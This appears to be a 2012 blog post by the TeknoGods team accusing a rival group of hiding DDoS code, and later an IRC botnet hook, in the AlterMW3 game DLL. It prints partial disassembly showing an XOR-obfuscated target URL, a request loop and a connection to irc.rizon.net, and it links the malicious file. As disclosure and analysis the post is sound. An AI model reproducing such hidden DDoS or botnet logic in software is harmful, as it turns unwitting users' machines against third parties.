A special announcement concerning AlterIW

Many of you have noticed we were under a heavy DDOS attack over the past week. After having fought it off pretty easily, we went out to investigate what kind of idiot would use his botnet for this kind of activity.

Today it came to our attention that ntauthority used YOU, the people who play in alterMW3, to do his dirty work. Yes, he used all of you – over 60000 people, to DDOS our website.

Below is a code snippet taken from AlterMW3’s “iw5m.dll” (the original, unmodified file is included with this post). The dll contains a thread function that runs constantly while you’re playing AlterMW3. What does it do? Well, it turns out it runs a DDOS attack on our website:

.text:100EBF70 push ebp .text:100EBF71 mov ebp, esp .text:100EBF73 sub esp, 354h .text:100EBF79 mov eax, dword_1029C6D0 .text:100EBF7E xor eax, ebp .text:100EBF80 mov [ebp+var_4], eax .text:100EBF83 push ebx .text:100EBF84 push esi .text:100EBF85 push edi .text:100EBF86 push 3 .text:100EBF88 call sub_100BE567 .text:100EBF8D add esp, 4 .text:100EBF90 call sub_100BF381 .text:100EBF95 mov [ebp+var_8], eax .text:100EBF98 cmp [ebp+var_8], 0 .text:100EBF9C jz loc_100EC483 .text:100EBFA2 .text:100EBFA2 loc_100EBFA2: .text:100EBFA2 mov eax, 1 .text:100EBFA7 test eax, eax .text:100EBFA9 jz loc_100EC483 .text:100EBFAF push 0FAh ; delay for the thread loop .text:100EBFB4 call ds:Sleep .text:100EBFBA mov [ebp+var_108], 't' ; encrypted link to teknogods forums .text:100EBFC1 mov [ebp+var_107], 'h' .text:100EBFC8 mov [ebp+var_106], 'h' .text:100EBFCF mov [ebp+var_105], 'l' .text:100EBFD6 mov [ebp+var_104], '&' .text:100EBFDD mov [ebp+var_103], '3' .text:100EBFE4 mov [ebp+var_102], '3' .text:100EBFEB mov [ebp+var_101], 'k' .text:100EBFF2 mov [ebp+var_100], 'k' .text:100EBFF9 mov [ebp+var_FF], 'k' .text:100EC000 mov [ebp+var_FE], '2' .text:100EC007 mov [ebp+var_FD], 'h' .text:100EC00E mov [ebp+var_FC], 'y' .text:100EC015 mov [ebp+var_FB], 'w' .text:100EC01C mov [ebp+var_FA], 'r' .text:100EC023 mov [ebp+var_F9], 's' .text:100EC02A mov [ebp+var_F8], '{' .text:100EC031 mov [ebp+var_F7], 's' .text:100EC038 mov [ebp+var_F6], 'x' .text:100EC03F mov [ebp+var_F5], 'o' .text:100EC046 mov [ebp+var_F4], '2' .text:100EC04D mov [ebp+var_F3], '' .text:100EC054 mov [ebp+var_F2], 's' .text:100EC05B mov [ebp+var_F1], 'q' .text:100EC062 mov [ebp+var_F0], '3' .text:100EC069 mov [ebp+var_EF], 'l' .text:100EC070 mov [ebp+var_EE], 't' .text:100EC077 mov [ebp+var_ED], 'l' .text:100EC07E mov [ebp+var_EC], '~' .text:100EC085 mov [ebp+var_EB], '~' .text:100EC08C mov [ebp+var_EA], '3' .text:100EC093 mov [ebp+var_E9], 1Ch .text:100EC09A mov [ebp+var_20C], 0

As you can see, this piece of code builds an encrypted string “thhl&33kkk2hywrs{sxo2.sq3ltl~~”. If we XOR this string with 0x1C, the result is “/phpbb”

This is the exact URL that we got attacked at constantly (that is why we moved our forum to phpbb_a). You can thank ntauthority for making you a part of HIS private botnet. We’re wondering though, what else he has used you people for? TeknoGods would never do anything like this, because it is lame, way below our standards and not to mention illegal.

Our dedicated servers work even when user is fully offline and do not require users to register for anything. Anyone can play from anywhere, anytime, offline and online (there are still a few bugs, but we’re working constantly to fix them).

TL;DR: Altermw3 is a malware; ntauthority of alteriw.net is using altermw3 users for a DDoS (distributed denial of service) attack against our web page.

If you’re a reverse-engineer, download the altermw3 ‘iw5m.dll’ malware here a see for yourself!

PS. New version of TeknoMW3 is almost ready!

LAST MINUTE UPDATE: Latest ‘iw5m.dll’ version of AlterMW3 connects to IRC – does it turn your computer into fully remotely controlled zombie PC? We strongly suggest: never trust AlterIW ever again.

UPDATE #2:

Log of lot of bots joining their channel: http://paste2.org/p/1898447see (Killed (http://irc.rizon.no (G-Lined: botnet not allowed on rizon)))

G-Lines are always MANUALLY added.

UPDATE #3:

They admit it here:

http://alteriw.net/viewtopic.php?f=140&t=109477#p1098485

UPDATE #4:

Their propaganda response here: http://alteriw.net/viewtopic.php?t=109481

UPDATE #5:

From their dll from yesterday:

.text:100E8B64 lea ecx, [ebp+var_2C]
.text:100E8B67 call sub_100C561B
.text:100E8B6C mov [ebp+var_4], 0
.text:100E8B73 call sub_100C0D4B
.text:100E8B78 push eax
.text:100E8B79 push offset aQD ; “q%d”
.text:100E8B7E lea eax, [ebp+var_4C]
.text:100E8B81 push eax
.text:100E8B82 call sub_100C0EEA
.text:100E8B87 add esp, 0Ch
.text:100E8B8A push offset unk_1024C194
.text:100E8B8F push offset aVeryRealIndeed ; “very real indeed”
.text:100E8B94 lea eax, [ebp+var_4C]
.text:100E8B97 push eax
.text:100E8B98 call sub_100C4D88
.text:100E8B9D push eax
.text:100E8B9E push 1A0Bh
.text:100E8BA3 push offset aIrc_rizon_net ; “irc.rizon.net”
.text:100E8BA8 lea ecx, [ebp+var_2C]
.text:100E8BAB call sub_100C01B1
.text:100E8BB0 push offset sub_100C453B
.text:100E8BB5 push offset a376 ; “376”
.text:100E8BBA lea ecx, [ebp+var_2C]
.text:100E8BBD call sub_100C10B1
.text:100E8BC2 lea ecx, [ebp+var_2C]
.text:100E8BC5 call sub_100BE005
.text:100E8BCA mov [ebp+var_4], 0FFFFFFFFh
.text:100E8BD1 lea ecx, [ebp+var_2C]
.text:100E8BD4 call sub_100C36A4

This is not any “ingame irc”, it is not referenced from elsewhere at the moment. What is it doing there anyway? It’s joining the #alteriwnet channel on irc.rizon.net to chat, except… you can’t. You can see from earlier logs about the bots, this is the exact thing that was being called when the bots were joining. How we found it? Well, while checking if the latest DLL is also DDoSing us, we figured the DDoS functionality is gone, and this (IRC) is done instead. In our books that looked like an upgrade from simple DDoSing app to a full blown C&C botnet. We have not time to fully analyse that part of their program, so decide for yourself whether to trust them again or not.

PPS: While being DDoSed we didn’t get an instant idea ‘it must be alteriw!!!’, no. We did not ever load up your binaries into disassembler, until yesterday – thanks to an anonymous tip, we have finally had some pointer for the DDoS cause – which of course had to be properly verified before making such statement. The original reported screen-shot can be found here.

UPDATE #6: AlterIW has issued a new response, it can be seen over here. Nice, way better than the previous one – except for the fact that even 1 request / millennium is too much (4 request / second from thousands of users simultaneously isn’t nothing by the way (0xFA Sleep = 0.25s)). It doesn’t matter how often the software was abusing our site, just the fact that it did.

What’s done is done, lets move on…

Regards,
- TeknoGods Team -

This entry was posted on February 8, 2012, 22:37 and is filed under Site news. You can follow any responses to this entry through RSS 2.0. Both comments and pings are currently closed.

A special announcement concerning AlterIW

Comments are closed.

Last Tweets

Social

Forum: Projects

Other links

Support us via ads